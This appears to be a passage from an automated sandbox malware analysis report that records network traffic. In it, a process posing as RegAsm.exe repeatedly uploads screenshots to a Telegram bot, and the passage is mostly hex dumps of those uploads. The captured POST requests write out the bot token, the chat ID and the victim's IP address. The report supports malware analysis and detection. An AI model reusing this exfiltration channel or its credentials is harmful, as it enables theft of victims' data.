                                                                            Data Ascii: =,~-b@^)H\~HI J"U5Xy%Vg$_CzPoJk=uwZ}bww>c+K$\5@Uj>~]S-cjj+xy_Dt+}$wZ^\q0bD]hvgkig.%Bs9RO(f
                                                                            2025-01-09 10:39:01 UTC16355OUTData Raw: 5e 22 22 59 75 20 c7 85 93 f7 06 2e 5d 50 7e 4f 03 cb 17 96 fc 4c e2 05 32 49 28 59 fe 46 85 df f2 b9 3d d9 dc 56 d8 15 80 8b 71 58 0b c0 0d 90 89 be 59 ac 91 77 db 20 00 33 69 b7 9d ec 0a c0 f9 2c 22 00 21 95 80 73 c8 44 de 56 58 54 00 ae bc b9 fc 5c 49 5c 32 e9 17 99 27 fb 0e e7 77 00 4a 26 fb 32 90 79 9b 21 13 80 92 09 bf 96 28 f4 66 11 c5 5e 1b 6f c7 91 45 05 20 1c 69 02 30 ca bf 28 00 ad f8 8b f2 0f 10 80 92 09 bf 96 ad 0a c0 38 1f 69 c5 9f 6c b7 00 cc 2a 01 21 ca 3f d8 ac 00 04 8f fd d2 b7 1a 90 3e 02 d0 38 64 02 50 99 d7 56 f7 71 1c 18 1c 93 67 2c ae 69 05 a0 ef fd 73 8c 00 cc 24 a0 15 82 51 d6 29 f5 94 75 1c 0b b6 ca 8f 77 04 32 66 6e cd f1 dd 81 b8 97 c4 aa bf b8 7f db f7 f8 2f 17 84 78 49 08 e2 cf cb 43 14 76 4a bb 28 f6 94 7a c6 a2 c4 b3 55 00
                                                                            Data Ascii: ^""Yu .]P~OL2I(YF=VqXYw 3i,"!sDVXT\I\2'wJ&2y!(f^oE i0(8il*!?>8dPVqg,is$Q)uw2fn/xICvJ(zU
                                                                            2025-01-09 10:39:01 UTC16355OUTData Raw: 23 ca 3d 85 a0 20 06 5b 62 f5 df 4c c9 37 03 aa 01 ad de 9b 05 02 10 b9 17 2b ff 3c f2 ab f0 53 fe 99 c3 18 c1 e7 7b fe 5a e9 27 7d ce 34 99 00 8c 7d a0 cf 45 21 b4 be 03 30 4a 3c a5 9e 55 7d fd dc 0d 53 12 d0 4a 40 2b fd 5c d3 ae 47 00 46 09 d8 0a c0 a3 ca 67 f3 5d 80 08 40 df fd 67 45 20 e2 ae 3d fa ab f4 63 4e f9 27 cc c7 1b 7f c9 a5 8d 02 90 be 63 c5 5f 94 76 ed 98 16 59 67 6c 94 77 61 ae 15 7d ae e5 36 e0 a5 67 5e 33 25 0d 9d ab eb 87 4a bf 58 05 28 88 40 2a fd bc e1 97 16 01 48 8b e8 8b 47 7f 7b e9 17 fb bd cc a3 6d 05 20 37 fd d6 0b 40 9e d1 cf 1b 43 fa 59 01 48 0c 01 38 39 e6 e3 55 e0 29 f9 7c ff 1f 12 af 8a b7 41 0e 66 72 0f da 77 08 d2 af 47 76 4b 1c 90 76 1e d5 45 fa 29 03 39 16 1c 45 1e 31 40 f4 29 fb c8 f7 79 0a c2 28 0d 11 84 c6 5a f1 a6 98
                                                                            Data Ascii: #= [bL7+<S{Z'}4}E!0J<U}SJ@+\GFg]@gE =cN'c_vYglwa}6g^3%JX(@*HG{m 7@CYH89U)|AfrwGvKvE)9E1@)y(Z
                                                                            2025-01-09 10:39:01 UTC16355OUTData Raw: fd 90 7c ca 3f a9 e2 6f 90 81 1c ff ed 05 60 26 f8 d6 63 9b 04 60 5b fd 47 b5 1f c7 81 11 7e d9 2f 24 20 f3 1c 11 a6 1f d7 6e e4 d2 90 c3 52 00 de 80 00 3c 7b a8 fe 43 fe 4d 57 ff 75 df 7f 6f 2f 00 ef be bb 5e 00 f2 c0 0b 4e e9 1e 7c ca ff d6 dd 7f ee 7b bb 7b 6f bb 6d a6 00 bc ec d3 7f dd 5d fe c5 8f 75 1f fe f6 8d 8f 1b 01 78 d6 d9 67 77 07 1f 7e 78 94 57 b4 c8 27 fa b7 de 75 7f f7 0f 87 77 d2 cd e3 d8 0b bf 5b d7 51 d1 16 e3 7f 12 2e b2 60 6c ff be fb ee ef 1e 3a 78 b0 7b d3 5b de 72 44 09 c0 f6 bb f2 e7 ec 2b 00 57 e5 1f d5 81 51 86 ce 15 80 7e 27 03 6b 04 60 fc ae 12 59 b7 13 ac 11 80 b2 46 00 ce a0 0a c0 f2 cf a2 58 11 58 40 ee 55 c1 77 31 ef 05 e4 fd 80 0f 77 7b 2f ed 46 f6 5d fe e8 50 19 d8 5f 32 c2 bb 03 eb 91 61 64 a0 22 b0 40 25 60 ad 08 7c df
                                                                            Data Ascii: |?o`&c`[G~/$ nR<{CMWuo/^N|{{om]uxgw~xW'uw[Q.`l:x{[rD+WQ~'k`YFXX@Uw1w{/F]P_2ad"@%`|
                                                                            2025-01-09 10:39:01 UTC16355OUTData Raw: 88 43 8e 00 23 e8 54 f1 37 23 fc 6c 6d 91 81 cd 5c 23 f5 24 f6 bc f8 03 3f ef 41 16 72 c4 58 fb d1 e6 a3 bf b6 ef 9a 7d 6e 4a ab f7 b4 9f e1 ae f6 9e 76 9e 2d ff bc 00 ac c5 1c c2 0e f1 c7 85 20 db d8 1e b9 4a 6f 80 e4 f3 f3 40 5f 63 f6 a2 af 1c 9f a7 5c 5f cd 07 be ca 4f 73 12 7f 1e 49 40 5d f6 21 e1 a7 ea 3f 2e 07 21 46 a5 9e 44 1f ad 9e e5 27 b1 e7 25 a0 60 2c 18 7b 31 e8 05 21 7d 5d f4 e1 a5 9f aa fc 40 73 aa f8 93 00 cc f2 cf be 97 5c 85 47 ac 48 3a a1 aa 3d fa cc 73 74 57 a2 50 22 10 94 43 3f 12 83 9d bf b8 a2 ad 32 f4 fb e5 b9 d7 fd 7d 2b ed 24 e4 24 ed 90 7c 5e fe d5 72 90 3e 22 4f 63 f2 54 ed e7 f7 93 08 d4 1e 12 80 40 9f 39 ed c5 c5 21 9d d7 5d d1 e6 30 f6 b9 ba 58 c4 c7 e6 f5 0c c0 cb bf 7e 79 16 80 f0 dc 73 cf a5 ef df 72 4f 3a ee ec bf cb 17
                                                                            Data Ascii: C#T7#lm\#$?ArX}nJv- Jo@_c\_OsI@]!?.!FD'%`,{1!}]@s\GH:=stWP"C?2}+$$|^r>"OcT@9!]0X~ysrO:
                                                                            2025-01-09 10:39:01 UTC16355OUTData Raw: 44 91 80 54 02 22 f5 10 7c 92 7c c4 84 a4 1f cf 0d 24 bf ac c9 a2 6e d7 e3 66 60 2c de 7e 5e ea 92 53 9e f9 97 fb c4 ca 9a 1e e1 a7 5c da 1a cb f7 d2 2b 4b 30 84 18 02 0d 29 46 9f 18 48 a0 d5 b2 ac 46 b9 c3 08 40 72 b4 9f d6 f1 da 5e 40 12 a7 2f a2 98 c6 ac e3 d9 83 d1 be c4 fa c5 59 a3 d7 2c 73 ad 00 44 06 d6 b2 0f 98 e3 62 0f 04 1c 20 f0 10 6f 3e e7 dd 5f 74 42 ce 88 e4 1f 30 37 5f 01 68 6b a8 02 d4 6b d0 cf 20 f9 90 80 c8 3f eb 67 f1 17 09 40 20 0f 81 27 24 e2 f6 b6 fe 51 f6 19 11 77 3c db 8f 96 71 8d c4 9f 28 7b 64 18 53 fd a7 e7 03 d2 27 a6 f9 8a 65 01 58 08 a4 de 28 44 d2 cf 13 4b 3f 8f 7d 87 83 08 a5 dd 0c 2f 67 01 38 b1 fe 97 69 f2 dc 5f b7 78 19 d8 23 02 c5 f9 f6 ff 15 a5 42 b0 ad 14 ac aa 02 3b 3c 3b b0 88 c0 88 a9 4d 36 b7 f1 b9 e6 06 e2 0b 9e
                                                                            Data Ascii: DT"||$nf`,~^S\+K0)FHF@r^@/Y,sDb o>_tB07_hkk ?g@ '$Qw<q({dS'eX(DK?}/g8i_x#B;<;M6
                                                                            2025-01-09 10:39:01 UTC16355OUTData Raw: c1 73 69 c5 79 cf a4 a9 73 7e 9d 26 6d 1d ef 71 f2 0c fb fd 2d cf 02 8c 88 84 5f 8d 17 7d be f5 f1 90 93 1f 8f e3 15 91 f4 eb 9c ec c6 91 d4 1b 85 4a e8 8d ca 52 0b 40 9f 0f 91 f4 f3 cc 48 3d 09 bf 1a 9f 33 c3 b2 00 6c c6 2f 77 01 38 4b e8 05 48 fe 79 01 d8 ae 2f 02 70 ea 2f 7f 9a a1 2f f9 d7 e1 e8 ed 22 0b 40 e6 fd 31 60 e5 ce 30 73 13 30 c7 80 fd c5 1f c3 08 40 44 5e 8d c4 a0 97 81 c4 e6 12 80 3a 02 ac 7e 67 81 cf 00 d4 25 20 54 fe 79 24 02 a1 bb f6 96 a6 d2 ef 70 1b 5b cb b8 f3 d6 9b db f8 6a 7b 6f 5e 02 d6 20 f8 a8 f4 5b 65 fb 82 af fa e3 38 30 f2 8f be 17 80 33 cf ff bb 2d 75 0e ba 21 4b 3d 24 1f af 33 7d 38 7b 35 af 27 31 a8 be 2a ff 5a 69 f8 d6 1f 36 97 79 1c 72 73 7b 09 08 62 8f 18 15 7e 12 82 5e f8 81 f2 57 73 4b 32 b7 04 bb a3 be 3a da 4b df 0b
                                                                            Data Ascii: siys~&mq-_}JR@H=3l/w8KHy/p//"@1`0s0@D^:~g% Ty$p[j{o^ [e803-u!K=$3}8{5'1*Zi6yrs{b~^WsK2:K
                                                                            2025-01-09 10:39:02 UTC389INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Thu, 09 Jan 2025 10:39:02 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 1828
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            26192.168.2.449845149.154.167.2204437588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-09 10:39:03 UTC2113OUTPOST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D [TRUNCATED]
                                                                            Content-Type: multipart/form-data; boundary================8dd34452f8ffdff
                                                                            Host: api.telegram.org
                                                                            Content-Length: 695479
                                                                            Connection: Keep-Alive
                                                                            2025-01-09 10:39:03 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 34 35 32 66 38 66 66 64 66 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48
                                                                            Data Ascii: --===============8dd34452f8ffdffContent-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAapH
                                                                            2025-01-09 10:39:03 UTC16355OUTData Raw: a1 27 79 27 69 07 3e 2f 51 47 cb 58 7b 48 e6 69 ad 62 92 7a be 17 63 bd 04 84 35 8a 4b f2 a9 d2 8f b5 ec cf bc e6 88 d1 4a e0 81 2a f3 24 e7 d4 12 a3 45 00 e6 aa bd 66 ec 79 c4 91 87 c8 3f 5a e5 31 07 f4 89 21 06 4b 01 28 d9 27 a9 e7 b2 4f f3 82 18 79 e4 33 9e a8 00 fc fc 95 81 dc 1b 85 6b 1f aa 4e b9 ee 91 ea 94 1b 1f 4b 3c 5e 9d 75 fb cf aa ab 1e f8 79 75 c7 4f 7f 5e 5d bd e6 91 a1 95 7e fd c8 f7 15 49 bb 49 62 9f 7f 36 d4 c2 af 10 80 54 ff 3d fe e5 ba ff f4 79 d5 b3 37 ee 3f a3 0a f0 b9 3b ea 2a c0 17 7e f4 fe ea 05 04 e0 4f 10 80 cd 31 e0 56 00 7e ba fa ed 03 07 86 22 6f b6 44 12 6f be 91 78 8b a4 dc 28 e8 05 1e c0 51 de 28 67 14 b4 47 24 f2 66 cb 7c 09 c0 53 4f 3d b5 7a f9 b7 bf b5 4a bf 5a 00 4e 8f e3 a3 bf e3 56 ff 65 01 d8 c8 bf 56 00 1e 7d f4 82
                                                                            Data Ascii: 'y'i>/QGX{Hibzc5KJ*$Efy?Z1!K('Oy3kNK<^uyuO^]~IIb6T=y7?;*~O1V~"oDox(Q(gG$f|SO=zJZNVeV}
                                                                            2025-01-09 10:39:03 UTC16355OUTData Raw: 78 25 0a c0 48 f2 0d 23 92 7e 4e 29 f4 4a d6 a6 00 8c 04 df 30 16 04 e0 3d 3d 22 af 5f 7c 18 91 fc 83 48 f4 f5 63 41 00 a6 39 93 7a d0 2f ee 55 80 03 41 e2 35 02 b0 94 80 12 80 5e 01 e8 f2 cf 05 a0 84 5e 84 e6 25 f3 3c 5f fb 97 b9 82 2a 40 d6 b8 f4 73 96 bd f5 b6 16 97 80 92 76 e3 20 a9 07 f4 15 73 ca 5c 97 7d 3a 0a 4c 1f c9 27 e1 a7 79 c5 24 09 c9 95 00 d4 33 04 fd 99 82 c0 b1 5f 97 7e 0e 02 90 4a be 52 f4 d1 d7 18 31 a8 6a 40 e1 63 97 7d 25 92 7c 7a 63 30 f2 af 14 80 3a f2 eb 95 7d 8c 25 fb 68 91 7f 5e 15 28 f2 78 d7 b4 be 11 80 aa ea f3 e3 be 88 3f c6 12 82 ca d7 11 60 64 1c 22 6e f9 6e 37 66 74 b4 57 62 0f e1 27 99 47 1f 5c e2 b5 22 af 41 73 9a 57 f5 9f 62 e5 3a de 06 8c d4 e3 b8 af c4 9f 44 9f f7 25 fd 24 0c 25 0d 91 79 12 80 aa 00 44 f6 d1 42 3e e6
                                                                            Data Ascii: x%H#~N)J0=="_|HcA9z/UA5^^%<_*@sv s\}:L'y$3_~JR1j@c}%|zc0:}%h^(x?`d"nn7ftWb'G\"AsWb:D%$%yDB>
                                                                            2025-01-09 10:39:03 UTC16355OUTData Raw: 98 05 df cd 3d 2c 7e db 2d 19 fa d1 11 62 c9 c2 fc 8c 40 84 1d f2 ae 91 83 5e 29 48 5c b1 7e 48 fc 49 20 4a 10 22 0c 55 35 58 a2 79 1d 25 56 8c b6 dd 67 1f 24 5f ef 0b 43 bc 7a 50 e3 c5 6f 4a 6b 8c a9 3d d2 75 77 bb ae 5a b4 e7 8d d5 b2 7d d2 f7 93 62 f4 89 77 77 bf 3e cf d1 12 63 ce 2b 00 4b 24 fe 5c 02 92 af 35 08 40 55 f5 e5 6a 3e a3 8d b7 15 7e 88 bd ab ab a5 bb 5d 53 2d db 1d c1 87 b8 63 ee aa 1c a3 df dd f1 f2 6a 6a a7 2b f2 78 79 ba 5f 44 df 8a 74 9f 2b d3 7d d2 b2 8f 8e 02 d3 97 0c 24 77 5a 08 5e 9d 8f 06 d3 ba 5c ec c7 14 e2 0d 71 b7 1b 82 30 ad df f1 aa aa bb fd 15 19 fa cc c1 62 44 5d 82 18 68 cc fa ce 76 97 67 e8 03 6b 69 99 67 ad f2 e9 97 d7 d0 fe 2e 02 25 0a 15 cb 42 b0 11 73 a5 b4 a3 a2 8f 96 39 84 9f aa 02 89 d1 92 ef 52 4f 28 be 84 17 66
                                                                            Data Ascii: =,~-b@^)H\~HI J"U5Xy%Vg$_CzPoJk=uwZ}bww>c+K$\5@Uj>~]S-cjj+xy_Dt+}$wZ^\q0bD]hvgkig.%Bs9RO(f
                                                                            2025-01-09 10:39:03 UTC16355OUTData Raw: 5e 22 22 59 75 20 c7 85 93 f7 06 2e 5d 50 7e 4f 03 cb 17 96 fc 4c e2 05 32 49 28 59 fe 46 85 df f2 b9 3d d9 dc 56 d8 15 80 8b 71 58 0b c0 0d 90 89 be 59 ac 91 77 db 20 00 33 69 b7 9d ec 0a c0 f9 2c 22 00 21 95 80 73 c8 44 de 56 58 54 00 ae bc b9 fc 5c 49 5c 32 e9 17 99 27 fb 0e e7 77 00 4a 26 fb 32 90 79 9b 21 13 80 92 09 bf 96 28 f4 66 11 c5 5e 1b 6f c7 91 45 05 20 1c 69 02 30 ca bf 28 00 ad f8 8b f2 0f 10 80 92 09 bf 96 ad 0a c0 38 1f 69 c5 9f 6c b7 00 cc 2a 01 21 ca 3f d8 ac 00 04 8f fd d2 b7 1a 90 3e 02 d0 38 64 02 50 99 d7 56 f7 71 1c 18 1c 93 67 2c ae 69 05 a0 ef fd 73 8c 00 cc 24 a0 15 82 51 d6 29 f5 94 75 1c 0b b6 ca 8f 77 04 32 66 6e cd f1 dd 81 b8 97 c4 aa bf b8 7f db f7 f8 2f 17 84 78 49 08 e2 cf cb 43 14 76 4a bb 28 f6 94 7a c6 a2 c4 b3 55 00
                                                                            Data Ascii: ^""Yu .]P~OL2I(YF=VqXYw 3i,"!sDVXT\I\2'wJ&2y!(f^oE i0(8il*!?>8dPVqg,is$Q)uw2fn/xICvJ(zU
                                                                            2025-01-09 10:39:03 UTC16355OUTData Raw: 23 ca 3d 85 a0 20 06 5b 62 f5 df 4c c9 37 03 aa 01 ad de 9b 05 02 10 b9 17 2b ff 3c f2 ab f0 53 fe 99 c3 18 c1 e7 7b fe 5a e9 27 7d ce 34 99 00 8c 7d a0 cf 45 21 b4 be 03 30 4a 3c a5 9e 55 7d fd dc 0d 53 12 d0 4a 40 2b fd 5c d3 ae 47 00 46 09 d8 0a c0 a3 ca 67 f3 5d 80 08 40 df fd 67 45 20 e2 ae 3d fa ab f4 63 4e f9 27 cc c7 1b 7f c9 a5 8d 02 90 be 63 c5 5f 94 76 ed 98 16 59 67 6c 94 77 61 ae 15 7d ae e5 36 e0 a5 67 5e 33 25 0d 9d ab eb 87 4a bf 58 05 28 88 40 2a fd bc e1 97 16 01 48 8b e8 8b 47 7f 7b e9 17 fb bd cc a3 6d 05 20 37 fd d6 0b 40 9e d1 cf 1b 43 fa 59 01 48 0c 01 38 39 e6 e3 55 e0 29 f9 7c ff 1f 12 af 8a b7 41 0e 66 72 0f da 77 08 d2 af 47 76 4b 1c 90 76 1e d5 45 fa 29 03 39 16 1c 45 1e 31 40 f4 29 fb c8 f7 79 0a c2 28 0d 11 84 c6 5a f1 a6 98
                                                                            Data Ascii: #= [bL7+<S{Z'}4}E!0J<U}SJ@+\GFg]@gE =cN'c_vYglwa}6g^3%JX(@*HG{m 7@CYH89U)|AfrwGvKvE)9E1@)y(Z
                                                                            2025-01-09 10:39:03 UTC16355OUTData Raw: fd 90 7c ca 3f a9 e2 6f 90 81 1c ff ed 05 60 26 f8 d6 63 9b 04 60 5b fd 47 b5 1f c7 81 11 7e d9 2f 24 20 f3 1c 11 a6 1f d7 6e e4 d2 90 c3 52 00 de 80 00 3c 7b a8 fe 43 fe 4d 57 ff 75 df 7f 6f 2f 00 ef be bb 5e 00 f2 c0 0b 4e e9 1e 7c ca ff d6 dd 7f ee 7b bb 7b 6f bb 6d a6 00 bc ec d3 7f dd 5d fe c5 8f 75 1f fe f6 8d 8f 1b 01 78 d6 d9 67 77 07 1f 7e 78 94 57 b4 c8 27 fa b7 de 75 7f f7 0f 87 77 d2 cd e3 d8 0b bf 5b d7 51 d1 16 e3 7f 12 2e b2 60 6c ff be fb ee ef 1e 3a 78 b0 7b d3 5b de 72 44 09 c0 f6 bb f2 e7 ec 2b 00 57 e5 1f d5 81 51 86 ce 15 80 7e 27 03 6b 04 60 fc ae 12 59 b7 13 ac 11 80 b2 46 00 ce a0 0a c0 f2 cf a2 58 11 58 40 ee 55 c1 77 31 ef 05 e4 fd 80 0f 77 7b 2f ed 46 f6 5d fe e8 50 19 d8 5f 32 c2 bb 03 eb 91 61 64 a0 22 b0 40 25 60 ad 08 7c df
                                                                            Data Ascii: |?o`&c`[G~/$ nR<{CMWuo/^N|{{om]uxgw~xW'uw[Q.`l:x{[rD+WQ~'k`YFXX@Uw1w{/F]P_2ad"@%`|
                                                                            2025-01-09 10:39:03 UTC16355OUTData Raw: 88 43 8e 00 23 e8 54 f1 37 23 fc 6c 6d 91 81 cd 5c 23 f5 24 f6 bc f8 03 3f ef 41 16 72 c4 58 fb d1 e6 a3 bf b6 ef 9a 7d 6e 4a ab f7 b4 9f e1 ae f6 9e 76 9e 2d ff bc 00 ac c5 1c c2 0e f1 c7 85 20 db d8 1e b9 4a 6f 80 e4 f3 f3 40 5f 63 f6 a2 af 1c 9f a7 5c 5f cd 07 be ca 4f 73 12 7f 1e 49 40 5d f6 21 e1 a7 ea 3f 2e 07 21 46 a5 9e 44 1f ad 9e e5 27 b1 e7 25 a0 60 2c 18 7b 31 e8 05 21 7d 5d f4 e1 a5 9f aa fc 40 73 aa f8 93 00 cc f2 cf be 97 5c 85 47 ac 48 3a a1 aa 3d fa cc 73 74 57 a2 50 22 10 94 43 3f 12 83 9d bf b8 a2 ad 32 f4 fb e5 b9 d7 fd 7d 2b ed 24 e4 24 ed 90 7c 5e fe d5 72 90 3e 22 4f 63 f2 54 ed e7 f7 93 08 d4 1e 12 80 40 9f 39 ed c5 c5 21 9d d7 5d d1 e6 30 f6 b9 ba 58 c4 c7 e6 f5 0c c0 cb bf 7e 79 16 80 f0 dc 73 cf a5 ef df 72 4f 3a ee ec bf cb 17
                                                                            Data Ascii: C#T7#lm\#$?ArX}nJv- Jo@_c\_OsI@]!?.!FD'%`,{1!}]@s\GH:=stWP"C?2}+$$|^r>"OcT@9!]0X~ysrO:
                                                                            2025-01-09 10:39:03 UTC16355OUTData Raw: 44 91 80 54 02 22 f5 10 7c 92 7c c4 84 a4 1f cf 0d 24 bf ac c9 a2 6e d7 e3 66 60 2c de 7e 5e ea 92 53 9e f9 97 fb c4 ca 9a 1e e1 a7 5c da 1a cb f7 d2 2b 4b 30 84 18 02 0d 29 46 9f 18 48 a0 d5 b2 ac 46 b9 c3 08 40 72 b4 9f d6 f1 da 5e 40 12 a7 2f a2 98 c6 ac e3 d9 83 d1 be c4 fa c5 59 a3 d7 2c 73 ad 00 44 06 d6 b2 0f 98 e3 62 0f 04 1c 20 f0 10 6f 3e e7 dd 5f 74 42 ce 88 e4 1f 30 37 5f 01 68 6b a8 02 d4 6b d0 cf 20 f9 90 80 c8 3f eb 67 f1 17 09 40 20 0f 81 27 24 e2 f6 b6 fe 51 f6 19 11 77 3c db 8f 96 71 8d c4 9f 28 7b 64 18 53 fd a7 e7 03 d2 27 a6 f9 8a 65 01 58 08 a4 de 28 44 d2 cf 13 4b 3f 8f 7d 87 83 08 a5 dd 0c 2f 67 01 38 b1 fe 97 69 f2 dc 5f b7 78 19 d8 23 02 c5 f9 f6 ff 15 a5 42 b0 ad 14 ac aa 02 3b 3c 3b b0 88 c0 88 a9 4d 36 b7 f1 b9 e6 06 e2 0b 9e
                                                                            Data Ascii: DT"||$nf`,~^S\+K0)FHF@r^@/Y,sDb o>_tB07_hkk ?g@ '$Qw<q({dS'eX(DK?}/g8i_x#B;<;M6
                                                                            2025-01-09 10:39:03 UTC16355OUTData Raw: c1 73 69 c5 79 cf a4 a9 73 7e 9d 26 6d 1d ef 71 f2 0c fb fd 2d cf 02 8c 88 84 5f 8d 17 7d be f5 f1 90 93 1f 8f e3 15 91 f4 eb 9c ec c6 91 d4 1b 85 4a e8 8d ca 52 0b 40 9f 0f 91 f4 f3 cc 48 3d 09 bf 1a 9f 33 c3 b2 00 6c c6 2f 77 01 38 4b e8 05 48 fe 79 01 d8 ae 2f 02 70 ea 2f 7f 9a a1 2f f9 d7 e1 e8 ed 22 0b 40 e6 fd 31 60 e5 ce 30 73 13 30 c7 80 fd c5 1f c3 08 40 44 5e 8d c4 a0 97 81 c4 e6 12 80 3a 02 ac 7e 67 81 cf 00 d4 25 20 54 fe 79 24 02 a1 bb f6 96 a6 d2 ef 70 1b 5b cb b8 f3 d6 9b db f8 6a 7b 6f 5e 02 d6 20 f8 a8 f4 5b 65 fb 82 af fa e3 38 30 f2 8f be 17 80 33 cf ff bb 2d 75 0e ba 21 4b 3d 24 1f af 33 7d 38 7b 35 af 27 31 a8 be 2a ff 5a 69 f8 d6 1f 36 97 79 1c 72 73 7b 09 08 62 8f 18 15 7e 12 82 5e f8 81 f2 57 73 4b 32 b7 04 bb a3 be 3a da 4b df 0b
                                                                            Data Ascii: siys~&mq-_}JR@H=3l/w8KHy/p//"@1`0s0@D^:~g% Ty$p[j{o^ [e803-u!K=$3}8{5'1*Zi6yrs{b~^WsK2:K
                                                                            2025-01-09 10:39:04 UTC389INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Thu, 09 Jan 2025 10:39:04 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 1828
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            27192.168.2.449862149.154.167.2204437588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-09 10:39:06 UTC2113OUTPOST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D [TRUNCATED]
                                                                            Content-Type: multipart/form-data; boundary================8dd34a0b1020d5f
                                                                            Host: api.telegram.org
                                                                            Content-Length: 695479
                                                                            Connection: Keep-Alive
                                                                            2025-01-09 10:39:06 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 61 30 62 31 30 32 30 64 35 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 